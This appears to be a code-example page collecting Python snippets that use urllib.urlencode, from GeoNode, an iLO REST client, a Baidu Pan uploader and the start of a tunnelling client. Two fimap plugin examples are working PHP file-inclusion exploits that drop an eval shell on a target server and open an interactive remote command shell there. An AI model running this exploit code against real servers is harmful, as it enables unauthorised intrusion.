    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=legend_url,
                               defaults=dict(
                                   extension='png',
                                   name='Legend',
                                   url=legend_url,
                                   mime='image/png',
                                   link_type='image',
                               )
                               )

    ogc_wms_path = '%s/wms' % instance.workspace
    ogc_wms_url = urljoin(ogc_server_settings.public_url, ogc_wms_path)
    ogc_wms_name = 'OGC WMS: %s Service' % instance.workspace
    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=ogc_wms_url,
                               defaults=dict(
                                   extension='html',
                                   name=ogc_wms_name,
                                   url=ogc_wms_url,
                                   mime='text/html',
                                   link_type='OGC:WMS',
                               )
                               )

    if instance.storeType == "dataStore":
        ogc_wfs_path = '%s/wfs' % instance.workspace
        ogc_wfs_url = urljoin(ogc_server_settings.public_url, ogc_wfs_path)
        ogc_wfs_name = 'OGC WFS: %s Service' % instance.workspace
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   url=ogc_wfs_url,
                                   defaults=dict(
                                       extension='html',
                                       name=ogc_wfs_name,
                                       url=ogc_wfs_url,
                                       mime='text/html',
                                       link_type='OGC:WFS',
                                   )
                                   )

    if instance.storeType == "coverageStore":
        ogc_wcs_path = '%s/wcs' % instance.workspace
        ogc_wcs_url = urljoin(ogc_server_settings.public_url, ogc_wcs_path)
        ogc_wcs_name = 'OGC WCS: %s Service' % instance.workspace
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   url=ogc_wcs_url,
                                   defaults=dict(
                                       extension='html',
                                       name=ogc_wcs_name,
                                       url=ogc_wcs_url,
                                       mime='text/html',
                                       link_type='OGC:WCS',
                                   )
                                   )

    # remove links that belong to an old address

    for link in instance.link_set.all():
        if not urlparse(
            settings.SITEURL).hostname == urlparse(
            link.url).hostname and not urlparse(
            ogc_server_settings.public_url).hostname == urlparse(
                link.url).hostname:
            link.delete()

    # Define the link after the cleanup; we should use this more rather than remove
    # potential parasites
    tile_url = ('%sgwc/service/gmaps?' % ogc_server_settings.public_url +
                'layers=%s' % instance.typename.encode('utf-8') +
                '&zoom={z}&x={x}&y={y}' +
                '&format=image/png8'
                )

    link, created = Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                               extension='tiles',
                                               name="Tiles",
                                               mime='image/png',
                                               link_type='image',
                                               )
    if created:
        Link.objects.filter(pk=link.pk).update(url=tile_url)

    # Save layer attributes
    set_attributes_from_geoserver(instance)

    # Save layer styles
    set_styles(instance, gs_catalog)
    # NOTTODO by simod: we should not do this!
    # need to be removed when fixing #2015
    from geonode.catalogue.models import catalogue_post_save
    from geonode.layers.models import Layer
    catalogue_post_save(instance, Layer)
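
The comment in the thumbnail section above is worth spelling out: urllib.urlencode quotes its values with quote_plus, so commas and slashes become %2C and %2F, which is exactly what the WMS reflector chokes on, while the manual join keeps them literal. A small sketch of the difference, with made-up parameter values:

import urllib

params = {'layers': 'geonode:roads', 'bbox': '-180,-90,180,90', 'format': 'image/png8'}

# urllib.urlencode percent-encodes the separators inside the values:
print urllib.urlencode(params)
# e.g. bbox=-180%2C-90%2C180%2C90&layers=geonode%3Aroads&format=image%2Fpng8

# The manual join used in geoserver_post_save keeps them literal:
print "&".join("%s=%s" % item for item in params.items())
# e.g. bbox=-180,-90,180,90&layers=geonode:roads&format=image/png8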

Example 11

Project: python-ilorest-library
Source File: v1.py
View license
    def _rest_request(self, path, method='GET', args=None, body=None, \
                    headers=None, optionalpassword=None, providerheader=None):
        """Rest request main function

        :param path: path within tree
        :type path: str
        :param method: method to be implemented
        :type method: str
        :param args: the arguments for method
        :type args: dict
        :param body: body payload for the rest call
        :type body: dict
        :param headers: provide additional headers
        :type headers: dict
        :param optionalpassword: provide password for authentication
        :type optionalpassword: str
        :param provideheader: provider id for the header
        :type providerheader: str
        :returns: returns a RestResponse object

        """
        headers = self._get_req_headers(headers, providerheader, \
                                                            optionalpassword)
        reqpath = path.replace('//', '/')

        if body is not None:
            if isinstance(body, dict) or isinstance(body, list):
                headers['Content-Type'] = u'application/json'
                body = json.dumps(body)
            else:
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(body)

            if method == 'PUT':
                resp = self._rest_request(path=path)

                try:
                    if resp.getheader('content-encoding') == 'gzip':
                        buf = StringIO()
                        gfile = gzip.GzipFile(mode='wb', fileobj=buf)

                        try:
                            gfile.write(str(body))
                        finally:
                            gfile.close()

                        compresseddata = buf.getvalue()
                        if compresseddata:
                            data = bytearray()
                            data.extend(buffer(compresseddata))
                            body = data
                except BaseException as excp:
                    LOGGER.error('Error occurred while compressing body: %s', excp)
                    raise

            headers['Content-Length'] = len(body)

        if args:
            if method == 'GET':
                reqpath += '?' + urllib.urlencode(args)
            elif method == 'PUT' or method == 'POST' or method == 'PATCH':
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(args)

        restreq = RestRequest(reqpath, method=method, body=body)

        attempts = 0
        while attempts < self.MAX_RETRY:
            if logging.getLogger().isEnabledFor(logging.DEBUG):
                try:
                    LOGGER.debug('HTTP REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                                (restreq.method, restreq.path, restreq.body))
                except:
                    LOGGER.debug('HTTP REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                                (restreq.method, restreq.path, 'binary body'))
            attempts = attempts + 1
            LOGGER.info('Attempt %s of %s', attempts, path)

            try:
                while True:
                    if self._conn is None:
                        self.__init_connection()

                    self._conn.request(method.upper(), reqpath, body=body, \
                                                                headers=headers)
                    self._conn_count += 1

                    inittime = time.clock()
                    resp = self._conn.getresponse()
                    endtime = time.clock()
                    LOGGER.info('Response Time to %s: %s seconds.'% \
                                        (restreq.path, str(endtime-inittime)))

                    if resp.getheader('Connection') == 'close':
                        self.__destroy_connection()
                    if resp.status not in range(300, 399) or \
                                                            resp.status == 304:
                        break

                    newloc = resp.getheader('location')
                    newurl = urlparse2.urlparse(newloc)

                    reqpath = newurl.path
                    self.__init_connection(newurl)

                restresp = RestResponse(restreq, resp)

                try:
                    if restresp.getheader('content-encoding') == "gzip":
                        compressedfile = StringIO(restresp.text)
                        decompressedfile = gzip.GzipFile(fileobj=compressedfile)
                        restresp.text = decompressedfile.read()
                except Exception as excp:
                    LOGGER.error('Error occurred while decompressing body: %s', \
                                                                        excp)
                    raise DecompressResponseError()
            except Exception as excp:
                if isinstance(excp, DecompressResponseError):
                    raise

                LOGGER.info('Retrying %s [%s]'% (path, excp))
                time.sleep(1)

                self.__init_connection()
                continue
            else:
                break

        self.__destroy_connection()
        if attempts < self.MAX_RETRY:
            if logging.getLogger().isEnabledFor(logging.DEBUG):
                headerstr = ''

                for header in restresp._http_response.msg.headers:
                    headerstr += '\t' + header.rstrip() + '\n'

                try:
                    LOGGER.debug('HTTP RESPONSE for %s:\nCode: %s\nHeaders:\n' \
                             '%s\nBody Response of %s: %s'%\
                             (restresp.request.path,\
                            str(restresp._http_response.status)+ ' ' + \
                            restresp._http_response.reason, \
                            headerstr, restresp.request.path, restresp.read))
                except:
                    LOGGER.debug('HTTP RESPONSE:\nCode:%s', (restresp))

            return restresp
        else:
            raise RetriesExhaustedError()
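
For the query/body handling in _rest_request above, the urlencode usage splits on the HTTP method: GET arguments become a query string, while PUT/POST/PATCH arguments become a form-encoded body. A reduced sketch of just that branch (the path and arguments are hypothetical):

import urllib

args = {'page': '2', 'filter': 'enabled'}   # hypothetical query arguments
reqpath = '/rest/v1/systems/1'
headers = {}
body = None

method = 'GET'
if method == 'GET':
    # GET: append the arguments as a query string
    reqpath += '?' + urllib.urlencode(args)
elif method in ('PUT', 'POST', 'PATCH'):
    # Write methods: send the same arguments as a form-encoded body instead
    headers['Content-Type'] = 'application/x-www-form-urlencoded'
    body = urllib.urlencode(args)
    headers['Content-Length'] = len(body)

print reqpath, headers, body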

Example 12

Project: python-ilorest-library
Source File: v1.py
View license
    def _rest_request(self, path='', method="GET", args=None, body=None,
                      headers=None, optionalpassword=None, providerheader=None):
        """Rest request for blob store client

        :param path: path within tree
        :type path: str
        :param method: method to be implemented
        :type method: str
        :param args: the arguments for method
        :type args: dict
        :param body: body payload for the rest call
        :type body: dict
        :param headers: provide additional headers
        :type headers: dict
        :param optionalpassword: provide password for authentication
        :type optionalpassword: str
        :param provideheader: provider id for the header
        :type providerheader: str
        :return: returns a RestResponse object

        """
        headers = self._get_req_headers(headers, providerheader, \
                                                            optionalpassword)

        if not self.is_redfish and self.default_prefix in path and \
                                                                path[-1] == '/':
            path = path[0:-1]
        elif self.is_redfish and self.default_prefix in path and \
                                                                path[-1] != '/':
            #TODO: Fix back
            path = path# + '/'
        else:
            pass

        reqpath = path.replace('//', '/')

        if body is not None:
            if isinstance(body, dict) or isinstance(body, list):
                headers['Content-Type'] = u'application/json'
                body = json.dumps(body)
            else:
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(body)

            if method == 'PUT':
                resp = self._rest_request(path=path)

                try:
                    if resp.getheader('content-encoding') == 'gzip':
                        buf = StringIO()
                        gfile = gzip.GzipFile(mode='wb', fileobj=buf)

                        try:
                            gfile.write(str(body))
                        finally:
                            gfile.close()

                        compresseddata = buf.getvalue()
                        if compresseddata:
                            data = bytearray()
                            data.extend(buffer(compresseddata))
                            body = data
                except BaseException as excp:
                    LOGGER.error('Error occurred while compressing body: %s', excp)
                    raise

            headers['Content-Length'] = len(body)

        if args:
            if method == 'GET':
                reqpath += '?' + urllib.urlencode(args)
            elif method == 'PUT' or method == 'POST' or method == 'PATCH':
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(args)

        str1 = '%s %s %s\r\n' % (method, reqpath, \
                                            Blobstore2RestClient._http_vsn_str)

        str1 += 'Host: \r\n'
        str1 += 'Accept-Encoding: identity\r\n'
        for header, value in headers.iteritems():
            str1 += '%s: %s\r\n' % (header, value)

        str1 += '\r\n'

        if body and len(body) > 0:
            if isinstance(body, bytearray):
                str1 = str1.encode("ASCII") + body
            else:
                str1 += body

        bs2 = BlobStore2()
        if not isinstance(str1, bytearray):
            str1 = str1.encode("ASCII")
        if logging.getLogger().isEnabledFor(logging.DEBUG):
            try:
                LOGGER.debug('Blobstore REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                         (method, path, body))
            except:
                LOGGER.debug('Blobstore REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                         (method, path, 'binary body'))                

        inittime = time.clock()
        resp_txt = bs2.rest_immediate(str1)
        endtime = time.clock()

        LOGGER.info("iLO Response Time to %s: %s secs."% \
                                                (path, str(endtime-inittime)))
        #Dummy response to support a bad host response
        if len(resp_txt) == 0:
            resp_txt = "HTTP/1.1 500 Not Found\r\nAllow: " \
            "GET\r\nCache-Control: no-cache\r\nContent-length: " \
            "0\r\nContent-type: text/html\r\nDate: Tues, 1 Apr 2025 " \
            "00:00:01 GMT\r\nServer: " \
            "HP-iLO-Server/1.30\r\nX_HP-CHRP-Service-Version: 1.0.3\r\n\r\n\r\n"

        restreq = RestRequest(reqpath, method=method, body=body)
        rest_response = RisRestResponse(restreq, resp_txt)

        if rest_response.status in range(300, 399) and \
                                                    rest_response.status != 304:
            newloc = rest_response.getheader("location")
            newurl = urlparse2.urlparse(newloc)

            rest_response = self._rest_request(newurl.path, method, args, \
                               body, headers, optionalpassword, providerheader)

        try:
            if rest_response.getheader('content-encoding') == 'gzip':
                compressedfile = StringIO(rest_response.text)
                decompressedfile = gzip.GzipFile(fileobj=compressedfile)
                rest_response.text = decompressedfile.read()
        except StandardError:
            pass
        if logging.getLogger().isEnabledFor(logging.DEBUG):
            headerstr = ''
            for header in rest_response._http_response.msg.headers:
                headerstr += '\t' + header.rstrip() + '\n'
            try:
                LOGGER.debug('Blobstore RESPONSE for %s:\nCode: %s\nHeaders:\n%s'\
                         '\nBody of %s: %s'%\
                         (rest_response.request.path,\
                        str(rest_response._http_response.status)+ ' ' + \
                        rest_response._http_response.reason, \
                        headerstr, rest_response.request.path, rest_response.read))
            except:
                LOGGER.debug('Blobstore RESPONSE for %s:\nCode:%s'% \
                             (rest_response.request.path, rest_response))
        return rest_response
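
Both _rest_request variants use the same body dispatch: dicts and lists go out as JSON, anything else is treated as form data and run through urllib.urlencode. A stand-alone sketch of that dispatch (an illustration of the pattern, not the library's public API):

import json
import urllib

def encode_body(body, headers):
    # Structured payloads are serialized as JSON; everything else is assumed
    # to be form data (e.g. a sequence of key/value pairs) and form-encoded.
    if isinstance(body, (dict, list)):
        headers['Content-Type'] = 'application/json'
        return json.dumps(body)
    headers['Content-Type'] = 'application/x-www-form-urlencoded'
    return urllib.urlencode(body)

headers = {}
print encode_body({'AssetTag': 'rack-42'}, headers)                 # JSON branch
print encode_body((('user', 'admin'), ('pw', 's3cret')), headers)   # form-encoded branch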

Example 13

Project: fimap
Source File: FindFirstFileAbuse.py
View license
    def plugin_callback_handler(self, callbackstring, haxhelper):
        if (callbackstring == "FindFirstFileAbuse.hax"):
            inp = -1
            
            while(inp != "q" and inp != "Q"):
                options = []
                
                urlDisplay = self.remotetmpdir
                
                if (urlDisplay == ""):
                    urlDisplay = "<None - Define one!>"
                
                options.append("1. Enter Path of TempDir")
                options.append("2. AutoProbe for TempDir")
                options.append("   Current TempDir: %s" %(urlDisplay))
                options.append("3. Change number of attempts (Current: %d)" %(self.maxAttempts))
                options.append("4. Change number of threads (Current: %d)" %(self.maxThreads))
                options.append("5. Change eggdrop location (Current: %s)" %(self.egg))
                options.append("6. Change your lottery ticket (Current: %s)" %(self.lotteryTicket))
                options.append("7. Launch attack")
                options.append("0. WTF is this shit?")
                options.append("q. Back to fimap")
                
                haxhelper.drawBox("FindFirstFile Glitch", options)
                inp = raw_input("Choose action: ")
                
                try:
                    idx = int(inp)
                    
                    if (idx == 1):
                        self.remotetmpdir = raw_input("Please type in the complete URL of the Remote Temporary Directory: ")
                        print "Remote Temporary Directory URL changed to: %s" %(self.remotetmpdir)
                    
                    elif (idx == 2):
                        print "AutoProbe not implemented right now :("
                        
                    elif (idx == 3):
                        tmp = raw_input("Please type in the number of attempts you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less attempts are not smart bro."
                            else:
                                self.maxAttempts = n
                                print "MaxAttempts changed to: %s" %(self.maxAttemps)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 4):
                        tmp = raw_input("Please type in the number of threads you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less threads are not smart bro."
                            else:
                                self.maxThreads = n
                                print "MaxThreads changed to: %s" %(self.maxThreads)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 5):
                        self.egg = raw_input("Please type location where to try to drop the egg.\nPlease no trailing '\\' :")
                        print "EggDrop location changed to: %s" %(self.egg)
                    
                    elif (idx == 6):
                        self.lotteryTicket = raw_input("Please type in your new lottery ticket: ")
                        print "LotteryTicket changed to: %s" %(self.lotteryTicket)
                    
                                        
                    elif(idx == 0):
                        print "This plugin uses a bug in the windows PHP versions which allows basicly to"
                        print "use jokers while including files."
                        print "You have to know the absolute path to the temporary directory where PHP"
                        print "will store its temporary files."
                        print "The plugin will then upload specially crafted files and tries to include"
                        print "them using your 'LotteryTicket' you can provide."
                        print "Your 'LotteryTicket' should contain a FindFirstFile compatible wildcard."
                        print "Print by default the 'LotteryTicket' is phpA<tmp which you can basicly translate to:"
                        print "'phpA*tmp'."
                        print "Once the plugin managed to exploit this vulnerability you will be prompted to the"
                        print "fimap lite shell which you should replace with your own shell asap."
                    
                    elif (idx == 7):
                        if (self.remotetmpdir != None and self.remotetmpdir != ""):
                            print "Launching attack..."
                            path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.remotetmpdir + "\\" + self.lotteryTicket)
                            
                            if (self.createEgg(haxhelper, path, postdata)):
                                # SUCCESSFULLY CREATED EVAL SHELL AT self.egg
                            
                                shell_banner = "fimap_eggshell> "
                                
                                lang = haxhelper.langClass
                                
                                quiz, answer = lang.generateQuiz()
                                #Since it's eval'd we remove the stuff...
                                quiz = quiz.replace("<?php", "")
                                quiz = quiz.replace("?>", "")
                                
                                path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.egg)
                                
                                domain = urlparse.urlsplit(haxhelper.getURL())[1]
                                url = urlparse.urljoin("http://" + domain, path)
                                
                                post = ""
                                
                                if (postdata != ""):
                                    post = postdata + "&"
                                
                                post += urllib.urlencode({"data": base64.b64encode(quiz)})
                                res = haxhelper.doRequest(url, post, header)
                                
                                if (res.find(answer) != -1):
                                    print "PHP Code Injection thru EggDrop works!"
                                    xmlconfig = haxhelper.parent_codeinjector.config["XML2CONFIG"]
                                    shellquiz, shellanswer = xmlconfig.generateShellQuiz(haxhelper.isUnix())
                                    shell_test_code = shellquiz
                                    shell_test_result = shellanswer 
                                    for item in self.lang.getExecMethods():
                                        name = item.getName()
                                        payload = None
                                        if (item.isUnix() and haxhelper.isUnix()) or (item.isWindows() and haxhelper.isWindows()):
                                            self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                                            code = item.generatePayload(shell_test_code)
                                            code = code.replace("<?php", "")
                                            code = code.replace("?>", "")
                                            testload = urllib.urlencode({"data": base64.b64encode(code)})
                                            
                                            if (postdata != ""):
                                                testload = "%s&%s" %(postdata, testload)
                                            code = self.doPostRequest(url, testload, header)
                                            
                                            if code != None and code.find(shell_test_result) != -1:
                                                working_shell = item
                                                self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                                                
                                                print "--------------------------------------------------------------------"
                                                print "Welcome to the fimap_eggshell!"
                                                print "This is a lite version of the fimap shell."
                                                print "Consider this shell as a temporary shell you should get rid of asap."
                                                print "Upload your own shell to be on the safe side."
                                                print "--------------------------------------------------------------------"  
                                                
                                                payload = raw_input(shell_banner)
                                                
                                                while (payload != "q" and payload != "Q"):
                                                    payload = item.generatePayload(payload)
                                                    payload = payload.replace("<?php", "")
                                                    payload = payload.replace("?>", "")
                                                    payload = urllib.urlencode({"data": base64.b64encode(payload)})
                                                    if (postdata != ""):
                                                        payload = "%s&%s" %(postdata, payload)
                                                    code = self.doPostRequest(url, payload, header)
                                                    print code
                                                    payload = raw_input(shell_banner)
                                                
                                                return
                                        else:
                                            self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                                else:
                                    print "PHP Code Injection thru EggDrop failed :("
                                    return
                            
                        else:
                            print "No Remote Temporary Directory defined."
                            
                except (ValueError):
                    pass
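
The fimap plugin above wraps every eval'd PHP payload the same way: base64-encode it, form-encode it under a data key with urllib.urlencode, and prepend whatever POST data the vulnerable request already needs. The wrapping in isolation (payload and field values here are purely illustrative):

import base64
import urllib

php_payload = 'echo "hello";'     # stand-in payload, illustration only
existing_postdata = 'foo=bar'     # POST data the target request already carries

post = urllib.urlencode({'data': base64.b64encode(php_payload)})
if existing_postdata:
    post = '%s&%s' % (existing_postdata, post)

print post   # foo=bar&data=ZWNobyAiaGVsbG8iOw%3D%3D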

Example 15

Project: fimap
Source File: TempFileAbuse.py
View license
    def plugin_callback_handler(self, callbackstring, haxhelper):
        if (callbackstring == "TempFileAbuse.hax"):
            
            print "-----------------------------------------------------------------------------"
            print "This plugin wouldn't be possible without the hard research of"
            print "     Gynvael Coldwind (http://gynvael.coldwind.pl)"
            print "      and"
            print "     Insomnia Security (http://insomniasec.com)"
            print "since it's based on this paper:"
            print "http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf"
            print "-----------------------------------------------------------------------------"
            
            inp = -1
            
            while(inp != "q" and inp != "Q"):
                options = []
                
                urlDisplay = self.phpinfourl
                
                if (urlDisplay == ""):
                    urlDisplay = "<None - Define one!>"
                
                options.append("1. Enter URL of PHPInfo()")
                options.append("2. AutoProbe for PHPInfo()")
                options.append("   Current URL: %s" %(urlDisplay))
                options.append("3. Change number of attempts (Current: %d)" %(self.maxAttempts))
                options.append("4. Change number of threads (Current: %d)" %(self.maxThreads))
                options.append("5. Change eggdrop location (Current: %s)" %(self.egg))
                options.append("6. Change number of trash to append (Current: %s)" %(self.trashFactor))
                options.append("7. Launch attack")
                options.append("q. Back to fimap")
                
                haxhelper.drawBox("PHPInfo Coldwind/Insomnia Glitch", options)
                inp = raw_input("Choose action: ")
                
                try:
                    idx = int(inp)
                    
                    if (idx == 1):
                        self.phpinfourl = raw_input("Please type in the complete URL of the PHPInfo() file: ")
                        print "PHPInfo() URL changed to: %s" %(self.phpinfourl)
                    
                    elif (idx == 2):
                        print "AutoProbe not implemented right now :("
                        
                    elif (idx == 3):
                        tmp = raw_input("Please type in the number of attempts you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less attempts are not smart bro."
                            else:
                                self.maxAttempts = n
                                print "MaxAttempts changed to: %s" %(self.maxAttemps)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 4):
                        tmp = raw_input("Please type in the number of threads you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less threads are not smart bro."
                            else:
                                self.maxThreads = n
                                print "MaxThreads changed to: %s" %(self.maxThreads)
                        except:
                            print "Invalid number."
                        
                    if (idx == 5):
                        self.egg = raw_input("Please type location where to try to drop the egg: ")
                        print "EggDrop location changed to: %s" %(self.egg)
                    
                    elif (idx == 6):
                        tmp = raw_input("Please type in the number of trash to append: ")
                        try:
                            n = int(tmp)
                            if (n < 0):
                                print "WTH. Less than zero trash is not possible. Trust me I tried it hard."
                            else:
                                self.trashFactor = n
                                print "TrashFactor changed to: %s" %(self.trashFactor)
                        except:
                            print "Invalid number."
                    
                    if (idx == 7):
                        if (self.phpinfourl != None and self.phpinfourl != ""):
                            print "Checking if the URL you provided is really a PHPInfo file..."
                            code = self.doGetRequest(self.phpinfourl)
                            if (code.find("alt=\"PHP Logo\"") == -1):
                                print "The URL '%s' is not a PHP info file! :(" %(self.phpinfourl)
                                return
                            print "Launching attack..."
                            if (self.createEgg(haxhelper)):
                                # SUCCESSFULLY CREATED EVAL SHELL AT self.egg
                            
                                shell_banner = "fimap_eggshell> "
                                
                                lang = haxhelper.langClass
                                
                                quiz, answer = lang.generateQuiz()
                                #Since it's eval'd we remove the stuff...
                                quiz = quiz.replace("<?php", "")
                                quiz = quiz.replace("?>", "")
                            
                                path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.egg)
                                
                                domain = urlparse.urlsplit(self.phpinfourl)[1]
                                url = urlparse.urljoin("http://" + domain, path)
                                
                                post = ""
                                
                                if (postdata != ""):
                                    post = postdata + "&"
                                
                                post += urllib.urlencode({"data": base64.b64encode(quiz)})
                                res = haxhelper.doRequest(url, post, header)
                                
                                if (res == answer):
                                    print "PHP Code Injection thru EggDrop works!"
                                    xmlconfig = haxhelper.parent_codeinjector.config["XML2CONFIG"]
                                    shellquiz, shellanswer = xmlconfig.generateShellQuiz(haxhelper.isUnix)
                                    shell_test_code = shellquiz
                                    shell_test_result = shellanswer 
                                    for item in self.lang.getExecMethods():
                                        name = item.getName()
                                        payload = None
                                        if (item.isUnix() and haxhelper.isUnix) or (item.isWindows() and not haxhelper.isUnix):
                                            self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                                            code = item.generatePayload(shell_test_code)
                                            code = code.replace("<?php", "")
                                            code = code.replace("?>", "")
                                            testload = urllib.urlencode({"data": base64.b64encode(code)})
                                            
                                            if (postdata != ""):
                                                testload = "%s&%s" %(postdata, testload)
                                            code = self.doPostRequest(url, testload, header)
                                            
                                            if code != None and code.find(shell_test_result) != -1:
                                                working_shell = item
                                                self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                                                
                                                print "--------------------------------------------------------------------"
                                                print "Welcome to the fimap_eggshell!"
                                                print "This is a lite version of the fimap shell."
                                                print "Consider this shell as a temporary shell you should get rid of asap."
                                                print "Upload your own shell to be on the safe side."
                                                print "--------------------------------------------------------------------"  
                                                
                                                payload = raw_input(shell_banner)
                                                
                                                while (payload != "q" and payload != "Q"):
                                                    payload = item.generatePayload(payload)
                                                    payload = payload.replace("<?php", "")
                                                    payload = payload.replace("?>", "")
                                                    payload = urllib.urlencode({"data": base64.b64encode(payload)})
                                                    if (postdata != ""):
                                                        payload = "%s&%s" %(postdata, payload)
                                                    code = self.doPostRequest(url, payload, header)
                                                    print code
                                                    payload = raw_input(shell_banner)
                                                
                                                return
                                        else:
                                            self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                                else:
                                    print "PHP Code Injection thru EggDrop failed :("
                                    return
                            
                        else:
                            print "No PHPInfo() URL defined."
                            
                except (ValueError):
                    pass

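The request-body pattern above can be reduced to a short standalone sketch: base64-encode the PHP payload, wrap it in a "data" parameter with urllib.urlencode, and prepend any existing POST data with "&". The helper name and sample values below are illustrative only, not part of fimap.

import base64
import urllib

def build_eggshell_body(php_payload, postdata=""):
    # urlencode percent-escapes the base64 value so it is safe in a form body
    encoded = urllib.urlencode({"data": base64.b64encode(php_payload)})
    if postdata != "":
        return "%s&%s" % (postdata, encoded)
    return encoded

print build_eggshell_body("echo 1+1;", "foo=bar")
# foo=bar&data=ZWNobyAxKzE7
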
Example 17

Project: baidu_http_pan
Source File: baiduyun.py
View license
    def upload_yunpan(self,filename,destdir):
        if self.bdstoken == '' :
            sys.exit(1)


        if self.BDUSS == '' :
            logger.info("login failed,please relogin")
            sys.exit(1)
        # record the start time
        starttime = time.time()
        logger.debug(starttime)
        
        # Upload the file with a POST request.
        #   Parameter 1: the BDUSS value from the cookie.
        #   The posted file has to be encoded, so the curl command is used to keep Python from failing on very large files.
        #
        upload_file_url = 'http://c.pcs.baidu.com/rest/2.0/pcs/file?' + urllib.urlencode({'BDUSS':self.BDUSS,
                    'method':'upload', 'type':'tmpfile', 'app_id':'250528', })
        logger.debug(upload_file_url)

        # fields = []
        # files = [('Filedata', filename, open(filename, 'rb'))]

        # iterate and write chunk in a socket
        # content_type, body = MultipartFormdataEncoder().encode(fields, files)
        # headers = {
        #     'Content-Type': content_type,
        #     'Content-Length': str(len(body)),
        #     }
        # req = urllib2.Request(upload_file_url,body,headers=headers)
        # page = urllib2.urlopen(req)

        curl_command = [ 'curl', '-b', self.cookiename, '-F', "file=@%s" % filename,
                    upload_file_url ]
        logger.debug(curl_command)
        
        # run the curl command
        from subprocess import Popen, PIPE
        process = Popen(curl_command, stdout=PIPE)
        result = process.stdout.read()
        process.wait()              # Wait for it to complete

        # extract the returned string; it contains the md5 that Baidu Cloud computed for the file, and the request id
        file_md5= json.loads(result)['md5']

        logger.debug("update website result string:%s",result)
        logger.debug("update file md5 sume:%s",file_md5)

        #
        # Create the just-uploaded file inside your own cloud directory.
        # Parameters: 1 bdstoken
        #             2 the directory where the file should be saved
        #             3 the file size
        #             4 the md5 of the file
        create_file_url = 'http://pan.baidu.com/api/create?' + urllib.urlencode({ 'a':'commit',
                            'channel':'chunlei', 'clienttype':'0', 'web':'1',
                            'bdstoken':self.bdstoken,
                        })
        logger.debug("create file file url:%s",create_file_url)

        post_data = urllib.urlencode( {
             'path':destdir + '/' + os.path.basename(filename),
            'isdir':'0',
            'size':os.stat(filename).st_size ,
            'block_list':"[\""+file_md5+"\"]",
            'method':'post',
            })
        urllib2.install_opener(self.opener)
        headers = {
            'Accept':'*/*', 'Accept-Encoding':'gzip,deflate,sdch',
            'Accept-Language':'zh-CN,zh;q=0.8', 'Connection':'keep-alive',
            'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
            'Host':'pan.baidu.com', 'Origin':'http://pan.baidu.com',
            'Referer':'http://pan.baidu.com/disk/home',
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',
            'X-Requested-With':'XMLHttpRequest', }
        req = urllib2.Request(create_file_url,post_data,headers=headers)

        #
        # Handle the result of the create operation. An errno of 0 means the create succeeded, and the response contains the file id, server-side filename, size, and other details.
        #
        result = urllib2.urlopen(req).read()
        logger.debug( result )
        errno = json.loads(result)["errno"]
        if errno != 0 :
            logger.debug( errno )
            logger.info("create file failed")

        # compute the end time and the upload speed
        endtime = time.time()
        logger.debug(endtime)
        usedtime = endtime - starttime
        speed = json.loads(result)['size'] / usedtime

        logger.info( "It is used :%ds " % usedtime)
        logger.info( "speed :%dbyte/s " % speed)
        logger.info( "upload file to " + json.loads(result)['path'] )

        # return the md5 of the uploaded file
        return file_md5
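
A minimal standalone sketch of the two urllib.urlencode uses above: building a query string that is appended to the endpoint URL after "?", and building an application/x-www-form-urlencoded POST body. The parameter values are illustrative and no request is sent.

import urllib

# query string appended to the endpoint URL
query = urllib.urlencode({'method': 'upload', 'type': 'tmpfile', 'app_id': '250528'})
upload_url = 'http://c.pcs.baidu.com/rest/2.0/pcs/file?' + query
# e.g. http://c.pcs.baidu.com/rest/2.0/pcs/file?type=tmpfile&app_id=250528&method=upload
# (key order follows dict iteration order)

# the same call also produces an application/x-www-form-urlencoded POST body
post_data = urllib.urlencode({'path': '/apps/demo/readme.txt', 'isdir': '0'})
# e.g. path=%2Fapps%2Fdemo%2Freadme.txt&isdir=0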

Example 19

Project: ABPTTS
Source File: abpttsclient.py
View license
def child(clientsock, clientAddr, listeningAddress, forwardingURL, destAddress, destPort):
	global clientToServerBuffer
	global socketTimeoutCurrent
	try:
		formattedServerAddress = '%s:%s' % (destAddress, destPort)
		formattedClientAddress = '%s:%s' % (clientAddr[0], clientAddr[1])
		socketTimeoutCurrent = conf.clientSocketTimeoutBase
		clientsock.settimeout(socketTimeoutCurrent)
		closeConnections = 0
		runChildLoop = 1
		if conf.accessKeyMode == "header":
